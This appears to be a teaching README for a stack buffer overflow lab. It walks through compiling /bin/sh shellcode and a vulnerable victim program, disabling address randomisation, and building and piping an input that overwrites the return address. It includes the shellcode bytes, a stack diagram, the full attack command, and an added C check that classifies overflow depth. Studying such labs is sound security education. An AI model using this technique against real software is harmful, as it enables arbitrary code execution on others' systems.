This is based on , the Makefile automates most of this. This has been tested on Debian 10.3 running kernel 4.19.0-8-amd64 and using gcc (Debian 8.3.0-6) 8.3.0.

1. Compile and test the shellcode

   ```
   make shellcode
   ```

2. Find the start and length of the shellcode

   ```
   make shellcode.hex
   ```

3. Compile and run the victim code

   ```
   make victim
   setarch $(arch) -R ./victim
   ```

4. Grab the address where the buffer is located on the stack and update the Makefile if necessary

5. Create the attack input

   ```
   make attack.bin
   ```

   ```
                       +----------------+
   0x0007fffffffe418   | return address |  d0e3 ffff ff7f 0000 ---+
                       |----------------|                         |
   0x0007fffffffe410   | saved rbp      |  0000 0000 0000 0000    |
                       |----------------|                         |
   0x0007fffffffe408   |                |  0000 0000 0000 0000    |
   0x0007fffffffe400   |                |  0000 0000 0000 0000    |
   0x0007fffffffe3f8   |                |  0000 0000 0000 0000    |
   0x0007fffffffe3f0   |                |  0000 0000 0000 0000    |
   0x0007fffffffe3e8   | char name[64]  |  6e2f 7368 00ef bead    |
   0x0007fffffffe3e0   |                |  e8ed ffff ff2f 6269    |
   0x0007fffffffe3d8   |                |  4831 f648 31d2 0f05    |
   0x0007fffffffe3d0   |                |  eb0e 5f48 31c0 b03b <--|
                       |----------------|
   ```

   The shellcode takes up the first 32 bytes of the buffer. The 80 zeroes in the printf represent 40 zero bytes, 32 of which fill the rest of the buffer, and the remaining 8 overwrite the saved location of the RBP register. The next 8 overwrite the return address, and point to the beginning of the buffer where our shellcode lies.

6. Run the attack

   ```
   make attack
   ```

   ```
   ( ( cat shellcode.hex ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) \
       | setarch $(arch) -R ./victim
   ```
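
The frame layout in the diagram (64-byte `name`, then saved RBP, then the return address) can be turned into a triage check that reports which saved slots an input of a given length reaches and whether the overwritten return address points back into the buffer. This is an added example, not code from this repository; `classify` and `verdict_for_len` are hypothetical names, the sample input is constructed (zero bytes plus the return-address bytes shown in the diagram, no shellcode), and it assumes the victim copies input into `name` with no bound and no added terminator.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout from the diagram: name[64], saved rbp, return address. */
enum { NAME_LEN = 64, SLOT = 8 };
#define BUF_ADDR 0x7fffffffe3d0ULL   /* address of name[] in the diagram */

enum verdict { FITS, HITS_SAVED_RBP, HITS_RETURN, RETURNS_INTO_BUFFER };

/* Decode a little-endian 64-bit value, as x86-64 stores it on the stack. */
static uint64_t le64(const unsigned char *p)
{
    uint64_t v = 0;
    for (int i = SLOT - 1; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* Classify len input bytes copied unbounded into name[] located at buf_addr. */
enum verdict classify(const unsigned char *in, size_t len, uint64_t buf_addr)
{
    if (len <= NAME_LEN)
        return FITS;
    if (len <= NAME_LEN + SLOT)
        return HITS_SAVED_RBP;
    if (len < NAME_LEN + 2 * SLOT)
        return HITS_RETURN;            /* partial overwrite of the return slot */
    uint64_t ret = le64(in + NAME_LEN + SLOT);
    if (ret >= buf_addr && ret < buf_addr + NAME_LEN)
        return RETURNS_INTO_BUFFER;    /* the arrow drawn in the diagram */
    return HITS_RETURN;
}

/* Constructed sample: 72 zero bytes followed by the diagram's return-address
   bytes. Classifies only the first len bytes of it. */
enum verdict verdict_for_len(size_t len)
{
    unsigned char sample[NAME_LEN + 2 * SLOT] = {0};
    static const unsigned char ret[SLOT] = {0xd0, 0xe3, 0xff, 0xff, 0xff, 0x7f, 0, 0};
    memcpy(sample + NAME_LEN + SLOT, ret, SLOT);
    return classify(sample, len, BUF_ADDR);
}

int main(void)
{
    static const size_t lens[] = {64, 72, 76, 80};
    for (size_t i = 0; i < 4; i++)
        printf("%zu bytes -> verdict %d\n", lens[i], verdict_for_len(lens[i]));
    return 0;
}
```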